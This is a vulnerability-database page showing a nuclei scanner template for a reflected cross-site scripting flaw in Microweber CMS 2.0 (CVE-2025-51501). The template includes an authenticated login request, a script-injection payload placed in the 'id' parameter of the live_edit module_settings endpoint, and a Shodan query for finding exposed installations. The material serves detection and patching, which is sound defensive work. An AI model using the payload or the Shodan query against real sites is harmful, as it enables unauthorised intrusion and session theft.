Lucene search
K

Microweber CMS2.0 - Cross-Site Scripting

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Reflected XSS in the id parameter of the live_edit.module_settings API in Microweber CMS2.0 allows JavaScript.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-51501
23 Aug 202521:02
circl
CNNVD
Microweber CMS 安全漏洞
1 Aug 202500:00
cnnvd
CVE
CVE-2025-51501
1 Aug 202500:00
cve
Cvelist
CVE-2025-51501
1 Aug 202500:00
cvelist
EUVD
EUVD-2025-23377
3 Oct 202520:07
euvd
Github Security Blog
Microweber has Reflected XSS Vulnerability in the id Parameter
1 Aug 202518:31
github
NVD
CVE-2025-51501
1 Aug 202517:15
nvd
OSV
CVE-2025-51501
1 Aug 202517:15
osv
OSV
GHSA-8357-FJVX-XRM8 Microweber has Reflected XSS Vulnerability in the id Parameter
1 Aug 202518:31
osv
Positive Technologies
PT-2025-31650 · Unknown · Microweber Cms2.0
1 Aug 202500:00
ptsecurity
Rows per page
id: CVE-2025-51501

info:
  name: Microweber CMS2.0 - Cross-Site Scripting
  author: nukunga
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) in the `id` parameter of the `live_edit.module_settings` API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in victim browsers through the id parameter in the module_settings API, potentially leading to session hijacking.
  remediation: |
    Upgrade Microweber CMS to a version later than 2.0 that properly sanitizes the id parameter in live_edit endpoints.
  reference:
    - https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51501
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51501
  metadata:
    verified: true
    max-requests: 2
    vendor: microweber
    product: microweber
    shodan-query: 'http.title:"Microweber"'
  tags: cve,cve2025,microweber,xss,authenticated,vuln

flow: http(1) && http(2)

variables:
  xss_payload: "</script><script>alert(document.domain)</script>"

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}&lang=en_US&where_to=admin_content

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "success\":", "username\":")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/live_edit/live_edit.module_settings?id={{xss_payload}}&type=shop/shipping/gateways/country/admin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "</script><script>alert(document.domain)</script>", "Add Country</a>")'
        condition: and
# digest: 4a0a004730450221008a815bd62f669ee67b3416e2f1d414c70e12ead350365056d0e97e7a183039a1022037a767625d16ca4000bbc6e49ab3471dfc8cbb1361e0d105e652b5339b393492:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.00776
SSVC
8